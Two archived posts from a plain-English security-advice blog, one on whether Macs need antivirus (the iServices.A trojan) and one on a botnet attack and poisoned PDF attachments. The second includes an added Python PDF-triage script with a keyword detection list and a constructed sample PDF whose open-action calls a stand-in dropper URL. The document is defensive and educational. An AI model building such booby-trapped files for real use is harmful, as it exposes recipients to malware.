Tech – for Everyone

Tech Tips and Tricks & Advice – written in plain English.

Do You Need AV on a Mac?

I get asked that from time to time. But usually I’m not asked, I’m told: “I don’t need all that *crud*. I’m on a Mac.”
Usually, but not always, there’s a certain tone the speaker adopts when uttering that Standard Line (read, “dogma”) that conveys a smug superiority.. but, hey, everyone’s entitled to a little.. uh, delusion or two in my book. Keeps life interesting.

Basis in fact: There are some reasons for this don’t-need-an-antivirus belief system. One is, Apple itself has promoted the idea. Another is, there were hardly any (and at some points in history, no, zero, zip, nada) viruses / trojans / worms / etc. written to exploit the Mac OS. And even now, they’re considered “rare”.

Cyber-criminals (aka “hackers”) knew that fewer than 5% of computers were Macs, and that essentially none of the “pots of gold” (database servers) were running the Mac OS.. so why write an attack program? (Apple products have proven quite “hackable” – iTunes, QuickTime and Safari actually rank quite high on the list. See, Firefox More Secure? Tops ‘Most Vulnerable’ List) Answer: there was basically nothing worth attacking with it.

Then and now: But that was before Vista, and before the “I’m a Mac” series of television commercials. Now, instead of approximately 1-in-20 PCs being Macs, it’s more like 1-in-10. Now the idea of an all-Mac botnet has some merit (and a true Mac fan will tell you, all the Windows PCs have already been taken!). An all-Mac botnet wouldn’t be all that big.. but the new numbers mean it’d be big enough for some uses…

So, sure enough, some enterprising criminal wrote a backdoor Trojan horse, bundled it with a pirated copy of iWork ’09 and posted the package to several torrent sites, knowing that Mac-using folks who don’t like paying for things would download and install it. Note that no vulnerability in the Mac OS is involved: the victim runs the installer himself, so the only thing being exploited is the user.
Voilà, we got us an all-Mac botnet.
[note: this has happened before, to Mac+LimeWire² users; see, Firms discover Trojan horse targeted at Mac OS X]

Someone has named this Trojan “iServices.A”, which is much more rational and.. nicer (ahem) than what I might have named it. It opens a backdoor that lets the hacker do pretty much what he wants with the infected machine; so far, that appears to be flooding specific web sites with traffic in what is called a “denial of service” attack (the flood overloads the server so that legitimate visitors can’t get through, or the server falls over entirely) (see, Our Modern Nightmare – Zombie Attack)

Me? I have consistently advised installing an AV, no matter what platform/OS you’re running, just as I consistently advise making backup copies of your files, (yes, I have been accused of being a bit of a “belt-and-suspenders” man) for one very simple reason — what is the cost if you do, versus what is the (potential) cost if you don’t?
Plus.. it’s simple math: the more popular Macs get, the more they’ll be targeted.

Feel free to disagree, but you won’t get me to change my mind. My Tiger machine has antivirus onboard.. though I don’t know why I bothered, I never turn the thing on.

Today’s free link(s):
* Brian Krebs has an absolutely great article detailing this Trojan, and I leave it to him to make what may be the most important point on the subject–
“Leaving aside (hopefully) the question of whether Mac users need anti-virus, I’ve tried to impress upon readers the importance of avoiding risky behaviors online that could jeopardize the security of their systems. The reality is that installing programs downloaded from P2P networks is about the most insecure practice a computer user can engage in,¹ regardless of the operating system in use.

This is why I think it’s important to call out this Trojan. Yes, it infects Macs, and that’s something we don’t see very often. But it’s also a teachable moment to remind readers that no security software is going to protect the user who is intent on installing software that may be tainted with malware, as long as that user is willing to ignore any advice (or alerts) to the contrary.”

I highly recommend you read the whole article, Pirated iWork Software Infects Macs With Trojan Horse. Once you do, I think you’ll understand why he’s on my Blogroll.

* Blogroll member Bill Mullins posted an article that takes a look at the P2P “phenomenon” that I also highly recommend, Peer to Peer File Sharing – Evaluate the Risks – Consider the Trade-Offs

* And this article is a very good answer to the question, Is Mac still the safer bet?

¹ emphasis, mine.
² A very popular peer-to-peer file-sharing program.

* One last thought.. anyone care to guess what percentage of people’s machines that I look at in my “real job” have LimeWire installed?

Copyright 2007-9 © Tech Paul. All rights reserved.


January 25, 2009 | Posted in: advice, antivirus, Apple, computers, cyber crime, hackers, News, security, tech

Botnets hurt Rockies, and poison .pdf’s (updated)

You have to feel sorry for the Colorado Rockies, even if you’re not a fan. After a miraculous run of victories swept them into the World Series, the Red Sox slammed them 13-1 in Game One (ouch!). To add insult to injury, their online ticket sales website crashed on Monday (after only 500 tickets had been sold), which the team believes was the result of a cyber-attack; namely a DoS attack launched from a botnet.
“Our website, and ultimately our fans and our organization, were the victim of an external, malicious attack that shut down the system and kept our fans from being able to purchase their World Series tickets,” Keli McGregor, team president, said Monday in a news release.

Very early in the history of Tech–for Everyone, I wrote two articles which discuss botnets and how your computer could be a zombie without your knowing it — and a couple of steps you can take to prevent a hacker from using your machine to mail out spam or launch attacks.

The first I titled “Some basic security pointers #1“, which I always think of by its opening sentence, “is your computer a zombie?”. In it I discuss User Account passwords, what makes a good password, and the hidden Windows Administrator account, and provide a link to a tool that tests the effectiveness of your firewall. (Click the links to view the articles.)

The second article was titled “The FBI and Operation: Bot Roast” which opens by asking the question, “is your computer a threat to national security?” In this article I discussed malware, such as rootkits and trojan horses, and how hackers use these to take control of your machine, and use it for their own, nefarious, purposes. I explained what a botnet is, and I provided a link to the pages on my business website where I list several dozen links to the best free antivirus and anti-spyware tools.

Tip of the day: Read these important articles and get educated about hackers and their evil programs, and then download the tools, and take the preventative steps, and thwart these Evil Doers. It is a fact that your machine can be used to interfere with our economic system and way of living.

Tip of the day #2: Do not open any PDFs you receive via email until your PDF reader has been updated (see the update at the bottom of this post). (Loyal friends and true will note that this is the first time I’ve posted two tips in one day.)
Currently making the rounds is an email attack that uses a poisoned .pdf attachment to download malware onto your machine. The attachment looks like a document, but it is really exploit code: opening it triggers a flaw in the way Windows XP handles specially crafted links once IE 7 is installed, and the code that runs then fetches the real payload from a remote server. Microsoft is aware of this, but has yet to release a patch (through Windows Update).
If you aren’t sure what an “exploit” is, I discussed it in an article titled “These folks had a very bad day“, which discusses exploits and vulnerabilities and how this is the Number One hacker technique for gaining control of your machine. In it I demonstrate how to configure your firewall and Update settings, and provide a link to website which will scan your machine for unpatched vulnerabilities and help you get updated and protected.
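A quick static check for the kind of attachment this tip is about, added here as an example; it is not code from the original post, nor from Adobe or any tool the post links to. It scans a PDF’s raw bytes for the action dictionaries a plain read-only document has no business carrying (anything that fires on open, launch or URI actions, scripts, embedded files, outbound links) and first resolves the #xx name escapes that attackers use to hide those keywords from a naive search. The two sample PDFs are constructed for the demonstration, and the keyword list and verdict rules are this example’s own choices, not anything the post or the PDF specification prescribes.

```python
import re

# Names that a static, read-only PDF has no reason to carry.  This selection
# is the example's own, not a list from the original post or from Adobe.
AUTO_RUN_NAMES = ("OpenAction", "AA")          # actions fired without a click
ACTIVE_NAMES = ("JavaScript", "JS", "Launch", "SubmitForm",
                "ImportData", "GoToR", "EmbeddedFile")
LINK_NAMES = ("URI",)

_HEX_ESCAPE = re.compile(rb"#([0-9A-Fa-f]{2})")
_URL_LITERAL = re.compile(rb"\((?:https?|ftp|mailto|file):[^)]*\)", re.I)


def normalize_names(data: bytes) -> bytes:
    """Resolve PDF name escapes, e.g. /Op#65nAction -> /OpenAction.

    PDF lets any byte of a name be written as #xx; malware authors use that
    to hide keywords from scanners that only look for the plain spelling.
    """
    return _HEX_ESCAPE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def count_names(data: bytes, names) -> dict:
    """Count each '/Name' token, requiring a non-name character after it so
    that /JS does not also count every /JSX-style token."""
    hits = {}
    for name in names:
        pattern = re.compile(rb"/" + name.encode() + rb"(?![A-Za-z0-9])")
        n = len(pattern.findall(data))
        if n:
            hits[name] = n
    return hits


def triage_pdf(data: bytes) -> dict:
    """Static indicators for a PDF attachment.

    Works on the raw bytes only: objects hidden inside compressed streams
    (/FlateDecode, /ObjStm) are not decoded, so "no static indicators" means
    "nothing visible", not "safe"; a hit, on the other hand, is worth a look.
    """
    text = normalize_names(data)
    auto = count_names(text, AUTO_RUN_NAMES)
    active = count_names(text, ACTIVE_NAMES)
    links = count_names(text, LINK_NAMES)
    external = bool(_URL_LITERAL.search(text)) or bool(links)
    compressed = b"/FlateDecode" in text or b"/ObjStm" in text

    if ("Launch" in active or "JavaScript" in active or "JS" in active
            or (auto and (active or external))):
        verdict = "suspicious"     # runs code, or reaches out as soon as it opens
    elif active or external:
        verdict = "review"         # a form or hyperlink: often legitimate, but check
    else:
        verdict = "no static indicators"

    return {
        "hits": {**auto, **active, **links},
        "runs_on_open": bool(auto),
        "external_reference": external,
        "has_compressed_objects": compressed,
        "verdict": verdict,
    }


# Constructed samples for the demonstration (not real attachments).
BENIGN_SAMPLE = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

# Same skeleton, but the catalog carries an action that fires on open and
# points at a remote server; the keyword is hex-escaped to dodge a naive grep.
POISONED_SAMPLE = (
    b"%PDF-1.4\n"
    b"1 0 obj << /Type /Catalog /Pages 2 0 R "
    b"/Op#65nAction << /S /URI /URI (http://dropper.example.invalid/stage2) >> >> endobj\n"
    b"2 0 obj << /Type /Pages /Kids [3 0 R] /Count 1 >> endobj\n"
    b"3 0 obj << /Type /Page /Parent 2 0 R /MediaBox [0 0 612 792] >> endobj\n"
    b"trailer << /Root 1 0 R >>\n%%EOF\n"
)

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN_SAMPLE), ("poisoned", POISONED_SAMPLE)):
        print(label, triage_pdf(sample))
```

Run it over a saved attachment with `triage_pdf(open(path, "rb").read())`. A "suspicious" verdict on something that was supposed to be a plain document is reason enough not to open it; the honest limitation is the other direction, since a real-world dropper usually compresses its objects and a byte-level scan cannot see inside those streams, which is exactly why the tip above says to patch the reader rather than rely on eyeballing the file.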

[update 10/30: From Secure Computing–
Ken Dunham, director of global response for iSight Partners, told today that one of his source’s honeypots received the infected email once every 10 seconds. This indicates “a fairly heavy spamming taking place,” especially for home users in advance of the weekend, he said.

The shadowy Russian internet service provider, Russian Business Network (RBN), is behind the attacks, which attempt to infect users with two rootkits that seek to steal personal and financial information from compromised PCs, Dunham said.

“You have what looks like a PDF attachment,” he said. “It’s actually exploit code designed to download code from a remote server.”

Adobe patched the bug Monday, so those who upgraded to Adobe Reader 8.1.1 and Acrobat 8.1.1 are safe.”]

Today’s free link: By clicking the links to the three articles posted above, and scrolling down to this section of the posts, you will find links to 50+ highly rated free security tools. Please, take advantage of them!



Do you appreciate all the free advice and links to safe and free software I provide six days a week–ad free? Do your friends (and me) a favor and let them know about Tech–for Everyone.


October 25, 2007 | Posted in: advice, anti-spyware, antivirus, computers, firewall, how to, IE 7, PC, security, tech, Windows, XP